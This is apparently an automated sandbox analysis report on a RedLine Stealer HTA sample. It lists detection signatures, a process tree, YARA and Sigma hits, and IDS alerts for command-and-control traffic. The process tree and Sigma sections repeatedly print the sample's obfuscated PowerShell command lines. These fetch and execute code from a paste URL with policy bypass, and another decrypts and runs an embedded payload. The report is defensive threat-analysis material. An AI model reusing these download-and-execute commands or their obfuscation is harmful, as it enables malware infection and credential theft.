Windows Analysis Report
payload_1.hta

Overview

General Information

Sample name: payload_1.hta
Analysis ID: 1576532
MD5: c95acf240ea0e5ab9ccc52d1bf50ff80
SHA1: 0c01a3638dad2f5e2cf9b9932f72b7f731f1c6c0
SHA256: 71e590840310d7eab4d8c339a094847523d368777cfda93fde87e0b25d9051f3
Tags: docu-signer-com, hta, user-JAMESWT_MHT

Detection

Family: RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7452 cmdline: mshta.exe "C:\Users\user\Desktop\payload_1.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = Cg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nJpn=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((CgMQB('484650636D48754D45634B49746F565A')),[byte[]]::new(16)).TransformFinalBlock($QBRr,0,$QBRr.Length)); & $nJpn.Substring(0,3) $nJpn.Substring(273) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • updater.exe (PID: 2668 cmdline: "C:\Users\user\AppData\Local\Temp\33260509\updater.exe" C:\Users\user\AppData\Local\Temp\33260509\JfEljoTl.dll MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          • MSBuild.exe (PID: 5888 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • Acrobat.exe (PID: 8052 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 1996 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 3528 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1648,i,15822098111641296172,2076974051186790361,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • AutoIt3.exe (PID: 3148 cmdline: "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)
    • MSBuild.exe (PID: 6700 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 1728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • AutoIt3.exe (PID: 1296 cmdline: "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)
    • MSBuild.exe (PID: 4660 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
No configs have been found
Source | Rule | Description | Author | Strings
0000000E.00000002.1758635983.0000000004A70000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000E.00000002.1758635983.0000000004A70000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000010.00000003.1897385765.00000000054F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000010.00000003.1897385765.00000000054F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000014.00000002.1898870666.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(5 of 27 entries shown)
Source | Rule | Description | Author | Strings
16.3.AutoIt3.exe.54c5d6c.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
16.3.AutoIt3.exe.54c5d6c.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
16.3.AutoIt3.exe.54c5d6c.0.unpack | MALWARE_Win_Arechclient2 | Detects Arechclient2 RAT | ditekSHen | see list below
21.2.AutoIt3.exe.44b6e70.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
21.2.AutoIt3.exe.44b6e70.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
(5 of 19 entries shown)

Strings matched by MALWARE_Win_Arechclient2 in 16.3.AutoIt3.exe.54c5d6c.0.unpack:
  • 0xb9042:$s14: keybd_event
  • 0xbfbb1:$v1_1: grabber@
  • 0xb9c14:$v1_2: <BrowserProfile>k__
  • 0xba68d:$v1_3: <SystemHardwares>k__
  • 0xba74c:$v1_5: <ScannedWallets>k__
  • 0xba7dc:$v1_6: <DicrFiles>k__
  • 0xba7b8:$v1_7: <MessageClientFiles>k__
  • 0xbab82:$v1_8: <ScanBrowsers>k__BackingField
  • 0xbabd4:$v1_8: <ScanWallets>k__BackingField
  • 0xbabf1:$v1_8: <ScanScreen>k__BackingField
  • 0xbac2b:$v1_8: <ScanVPN>k__BackingField
  • 0xac45a:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
  • 0xabd66:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
Source | Rule | Description | Author | Strings
amsi32_7608.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | see list below

Strings matched by INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC in amsi32_7608.amsi.csv:
  • 0xb6a2:$b1: ::WriteAllBytes(
  • 0x10ba:$s1: -join
  • 0xae15:$s1: -join
  • 0xb757:$s1: -join
  • 0x45c1:$s4: +=
  • 0x4683:$s4: +=
  • 0x88aa:$s4: +=
  • 0xa9c7:$s4: +=
  • 0xacb1:$s4: +=
  • 0xadf7:$s4: +=
  • 0xd712:$s4: +=
  • 0xd792:$s4: +=
  • 0xd858:$s4: +=
  • 0xd8d8:$s4: +=
  • 0xdaae:$s4: +=
  • 0xdb32:$s4: +=
  • 0xb180:$e4: Start-Process
  • 0xbbdd:$e4: Get-WmiObject
  • 0xbdcc:$e4: Get-Process
  • 0xbe24:$e4: Start-Process

System Summary
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = Cg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
Source: Process started, Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE97
Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = Cg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
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\33260509\updater.exe, ProcessId: 2668, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ggkfcbc
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE97
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = Cg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
Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = Cg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
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T08:34:27.531614+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49735 | TCP
2024-12-17T08:35:42.321939+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49809 | TCP
2024-12-17T08:35:49.977329+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49817 | TCP
2024-12-17T08:35:51.231060+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49818 | TCP
2024-12-17T08:35:54.621191+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49822 | TCP
2024-12-17T08:36:01.598443+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49827 | TCP
2024-12-17T08:36:47.257157+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49858 | TCP
2024-12-17T08:36:48.514417+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49859 | TCP
2024-12-17T08:37:00.472691+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49868 | TCP
2024-12-17T08:37:08.995721+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49875 | TCP
2024-12-17T08:37:35.911109+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49893 | TCP
2024-12-17T08:37:47.434759+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49902 | TCP
2024-12-17T08:37:55.143020+0100 | 2029217 | 1 | Malware Command and Control Activity Detected | 185.147.124.236 | 15647 | 192.168.2.8 | 49908 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T08:34:26.332263+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:26.452075+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:26.572237+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:26.692095+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:26.812011+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:26.931930+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:27.051817+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:27.171725+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:27.293914+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:27.413711+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:27.531821+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:27.651598+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:27.915695+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:28.213533+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:28.406108+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:34:28.526097+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:35:41.125605+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49809 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:35:47.910346+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49815 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:35:48.783751+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49817 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:35:50.003699+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49818 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:35:53.426088+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49822 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:00.400537+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49827 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:00.643477+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49827 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:00.781582+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49827 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:46.063821+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49858 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:46.202010+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49858 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:46.274225+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49858 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:46.382068+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49858 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:47.125167+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49858 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:47.318495+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49859 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:48.383149+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49859 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:48.438898+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49859 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:59.280615+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49868 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:59.510389+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49868 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:59.549314+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49868 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:36:59.616388+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49868 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:00.357474+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49868 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:07.791734+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49875 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:07.981724+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49875 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:34.674136+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49893 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:34.869558+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49893 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:34.989599+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49893 | 185.147.124.236 | 15647 | TCP
